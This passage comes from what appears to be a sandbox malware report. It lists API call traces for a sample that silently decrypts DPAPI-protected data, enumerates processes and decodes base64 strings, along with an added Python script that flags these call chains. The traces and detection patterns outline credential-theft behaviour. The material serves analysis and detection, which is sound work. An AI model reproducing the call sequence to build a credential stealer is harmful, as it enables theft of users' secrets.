                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 001172E1
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00117304
                                      • LocalFree.KERNEL32(?), ref: 0011730E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 2609814428-0
                                      • Opcode ID: 6ac9017addc1fea444bca78b99ec6381229ceb89f8a076a0a1a56e91078fb06a
                                      • Instruction ID: 98fd64208c0c04234a9e678241defdfde8a30e8c4cf37e6c8a6f78ee52de7791
                                      • Opcode Fuzzy Hash: 6ac9017addc1fea444bca78b99ec6381229ceb89f8a076a0a1a56e91078fb06a
                                      • Instruction Fuzzy Hash: B9010C75A44308BBDB24DFE4DD46F9E7778AB44B00F104554FB05AA2C0D6B0AA409B64
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001297AE
                                      • Process32First.KERNEL32(00130ACE,00000128), ref: 001297C2
                                      • Process32Next.KERNEL32(00130ACE,00000128), ref: 001297D7
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 001297EC
                                      • CloseHandle.KERNEL32(00130ACE), ref: 0012980A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: e98b58423268831688140d81c905c0fb0a8fba5ee0e38841d82873e926f0e7ae
                                      • Instruction ID: e8846984974bb564fe00ccf5e9c4c76594e9899af5ffe7ac75730e620efe5981
                                      • Opcode Fuzzy Hash: e98b58423268831688140d81c905c0fb0a8fba5ee0e38841d82873e926f0e7ae
                                      • Instruction Fuzzy Hash: 8A011E75A14218EBDB25DFA4DD88BDDB7BCBB08700F144688E5099B280E7309B50CF50
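                                       The three "APIs" lists above describe, in order, a base64-to-binary conversion followed by string building (lstrlen, CryptStringToBinaryA, lstrcat), a DPAPI decryption with the result converted to a narrow string (GetProcessHeap, RtlAllocateHeap, CryptUnprotectData, WideCharToMultiByte, LocalFree), and a walk over the process list with a per-entry name comparison (CreateToolhelp32Snapshot, Process32First, Process32Next, StrCmpCA, CloseHandle). The block below is an added example written for this page, not code from the Joe Sandbox report or from the sample: it parses those lines exactly as printed here and matches them against three ordered call chains. The chain names are the editor's; treating list order (ascending ref addresses) as call order is an assumption, as is the fourth, constructed negative case. The decoded constants are facts: TH32CS_SNAPPROCESS is 0x2 in tlhelp32.h and CRYPTPROTECT_UI_FORBIDDEN is 0x1 in dpapi.h. Which data CryptUnprotectData is decrypting is not established by the page; what the page does show is a NULL optional-entropy pointer and the UI-forbidden flag, the way locally DPAPI-protected secrets are read back without a prompt.

```python
import re
from dataclasses import dataclass

# Constructed input: the three "APIs" lists quoted from the entries above, keyed
# by each function's first ref address, plus one constructed negative case that
# touches only plain string APIs and should match no chain.
SAMPLE_FUNCTIONS = {
    "0011C971": """
• lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0011C971
• CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0011C97C
• lstrcat.KERNEL32(?,00130B47), ref: 0011CA43
• lstrcat.KERNEL32(?,00130B4B), ref: 0011CA57
• lstrcat.KERNEL32(?,00130B4E), ref: 0011CA78
""",
    "001172AD": """
• GetProcessHeap.KERNEL32(00000008,00000400), ref: 001172AD
• RtlAllocateHeap.NTDLL(00000000), ref: 001172B4
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 001172E1
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00117304
• LocalFree.KERNEL32(?), ref: 0011730E
""",
    "001297AE": """
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001297AE
• Process32First.KERNEL32(00130ACE,00000128), ref: 001297C2
• Process32Next.KERNEL32(00130ACE,00000128), ref: 001297D7
• StrCmpCA.SHLWAPI(?,00000000), ref: 001297EC
• CloseHandle.KERNEL32(00130ACE), ref: 0012980A
""",
    "constructed-negative": """
• lstrlen.KERNEL32(?), ref: 00100000
• lstrcat.KERNEL32(?,?), ref: 00100010
""",
}

# One report line: "• Api.MODULE(arg,arg,...), ref: ADDRESS"
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list  # None where the sandbox printed '?', int for hex values
    ref: int


def parse_api_lines(text):
    """Parse a function entry's 'APIs' lines into ApiCall records, skipping other lines."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args").strip()
        args = [None if a == "?" else int(a, 16) for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


# Ordered call chains (editor's definitions). A chain matches when its APIs occur
# in this order, not necessarily adjacently, in the function's call list.
CHAINS = {
    "dpapi-unprotect": ("CryptUnprotectData", "LocalFree"),
    "base64-decode-then-build-string": ("CryptStringToBinaryA", "lstrcat"),
    "process-enumeration": ("CreateToolhelp32Snapshot", "Process32First", "Process32Next"),
}

TH32CS_SNAPPROCESS = 0x00000002         # tlhelp32.h
CRYPTPROTECT_UI_FORBIDDEN = 0x00000001  # dpapi.h


def _in_order(names, wanted):
    # Subsequence test: each wanted name must be found after the previous one.
    it = iter(names)
    return all(w in it for w in wanted)


def classify(calls):
    """Return (matched chain names, argument-level notes) for one function."""
    names = [c.api for c in calls]
    chains = [name for name, seq in CHAINS.items() if _in_order(names, seq)]
    notes = []
    for c in calls:
        if c.api == "CreateToolhelp32Snapshot" and c.args and c.args[0] == TH32CS_SNAPPROCESS:
            notes.append("snapshot flags = TH32CS_SNAPPROCESS: process list only")
        if c.api == "CryptUnprotectData" and len(c.args) >= 6:
            # (pDataIn, ppszDataDescr, pOptionalEntropy, pvReserved, pPromptStruct, dwFlags, pDataOut)
            entropy, flags = c.args[2], c.args[5]
            if entropy == 0:
                notes.append("CryptUnprotectData without optional entropy")
            if flags is not None and flags & CRYPTPROTECT_UI_FORBIDDEN:
                notes.append("CryptUnprotectData with CRYPTPROTECT_UI_FORBIDDEN")
    return chains, notes


def scan_report(functions):
    """Classify every function entry; returns {first ref: (chains, notes)}."""
    return {ref: classify(parse_api_lines(text)) for ref, text in functions.items()}


if __name__ == "__main__":
    for ref, (chains, notes) in scan_report(SAMPLE_FUNCTIONS).items():
        print(ref, chains, notes)
```

                                       One caveat when reading argument values from these lists: the sandbox prints whatever is on the stack at the call, so for a zero-argument API the printed values belong to a neighbour. The (00000008,00000400) shown against GetProcessHeap read as RtlAllocateHeap's flags (HEAP_ZERO_MEMORY is 0x8) and size, and the same 0x400 reappears as the cbMultiByte limit passed to WideCharToMultiByte; that is an inference from the printed values, not something the report states.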
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: <7\h$huzx
                                      • API String ID: 0-2989614873
                                      • Opcode ID: aefaf097f79d00f3cb7cc583a99de9ca3f86213f6f2ab66147132978ee289807
                                      • Instruction ID: a9c64d120948b5159a66152b0db4714bd03a0a6dcc6f7f2fd615b28a992e811b
                                      • Opcode Fuzzy Hash: aefaf097f79d00f3cb7cc583a99de9ca3f86213f6f2ab66147132978ee289807
                                      • Instruction Fuzzy Hash: 2963357241EBD41ECB27CB3047B61A17F66BA13A10B1D49CEC8C18F5B3C794AA16E356
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: VwCg$kon?$x`-$U~r
                                      • API String ID: 0-2101599867
                                      • Opcode ID: d2b157370288e4a10cd22eb8f75e09b990090c400b0539a5ce01b176b1257a84
                                      • Instruction ID: 6f3e50f190328061da93ee19df2ea9c5e40f1aded48c1b09b1e968f9d6564100
                                      • Opcode Fuzzy Hash: d2b157370288e4a10cd22eb8f75e09b990090c400b0539a5ce01b176b1257a84
                                      • Instruction Fuzzy Hash: 95B2F7F3A0C2049FE3046E2DEC8567AFBE9EF94720F16493DEAC5D3744EA3558018696
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,001151D4,40000001,00000000,00000000,?,001151D4), ref: 00129050
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: 9553eacfc06f38f6933bd24ebc89fe3a69a5f902e5330e3eb1113c6368f6e132
                                      • Instruction ID: aba897a04132377d99cf50fda2ea608b0c8343882ac781ab0cc05fee653c5ba7
                                      • Opcode Fuzzy Hash: 9553eacfc06f38f6933bd24ebc89fe3a69a5f902e5330e3eb1113c6368f6e132
                                      • Instruction Fuzzy Hash: 5F110670204218FFDF14CF58E894FAB33ADAF89310F108548FA198B250D772ED518BA8
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00114F3E,00000000,00000000), ref: 0011A23F
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00114F3E,00000000,?), ref: 0011A251
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00114F3E,00000000,00000000), ref: 0011A27A
                                      • LocalFree.KERNEL32(?,?,?,?,00114F3E,00000000,?), ref: 0011A28F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID:
                                      • API String ID: 4291131564-0
                                      • Opcode ID: 4106d17a48b2c1a0bea45f984456b299707d06eed799f962e37c6def7db4325b
                                      • Instruction ID: b8a28a34805c9749ab690cb5b38292fdfc7efe2adf0f2c50de7854702de15c22
                                      • Opcode Fuzzy Hash: 4106d17a48b2c1a0bea45f984456b299707d06eed799f962e37c6def7db4325b
                                      • Instruction Fuzzy Hash: 2411C374641308AFEB15CF64CC95FAA77B9EB88B00F208558FA159F2D0D7B2A941CB50
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00130DE8,00000000,?), ref: 00127B40
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00127B47
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00130DE8,00000000,?), ref: 00127B54
                                      • wsprintfA.USER32 ref: 00127B83
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      • Opcode ID: bdee9ea980dddc8f1abf4c8dac1f98baafd322274fad0b9d6621f81bf4c086c4
                                      • Instruction ID: 7d43a5305f4a447e9cbc40bdb4cd48e600b75d4ebdff7ce4d947456b7798b528
                                      • Opcode Fuzzy Hash: bdee9ea980dddc8f1abf4c8dac1f98baafd322274fad0b9d6621f81bf4c086c4
                                      • Instruction Fuzzy Hash: 32112AB2908158ABCB24DBC9ED85BBEB7BCFB4CB11F10461AF605A6280D3395940C7B0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E3F2D8,00000000,?,00130DF8,00000000,?,00000000,00000000), ref: 00127BF3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00127BFA
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E3F2D8,00000000,?,00130DF8,00000000,?,00000000,00000000,?), ref: 00127C0D
                                      • wsprintfA.USER32 ref: 00127C47
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 3317088062-0
                                      • Opcode ID: c189482d6834c13b83aaaf8a44de5d8e4a939a018d6c376e09552fc64c2197e0
                                      • Instruction ID: dcc1c6ee795bb554c8b55f08a16b5ed8e1b95a69e12aa966fd76f176c09d6b7c
                                      • Opcode Fuzzy Hash: c189482d6834c13b83aaaf8a44de5d8e4a939a018d6c376e09552fc64c2197e0
                                      • Instruction Fuzzy Hash: 4811A1B1909229EBEB24CB64EC45FAAB77CFB44711F1007D5F619A72D0D7741A508B50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: -5_$AL%}$AP\O
                                      • API String ID: 0-55666361
                                      • Opcode ID: ded9e96bd11b011c06524acee7d560d2100644484d03c329991c500f20e65088
                                      • Instruction ID: 6e0ef2c23c258b68c6d2f1f1283d8f95b028a0f4ef42f37e4df819753efece44
                                      • Opcode Fuzzy Hash: ded9e96bd11b011c06524acee7d560d2100644484d03c329991c500f20e65088
                                      • Instruction Fuzzy Hash: B8B229F3A0C2049FE3046E2DEC8567AFBE9EF94620F1A453DEAC4C7744EA3558058697
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
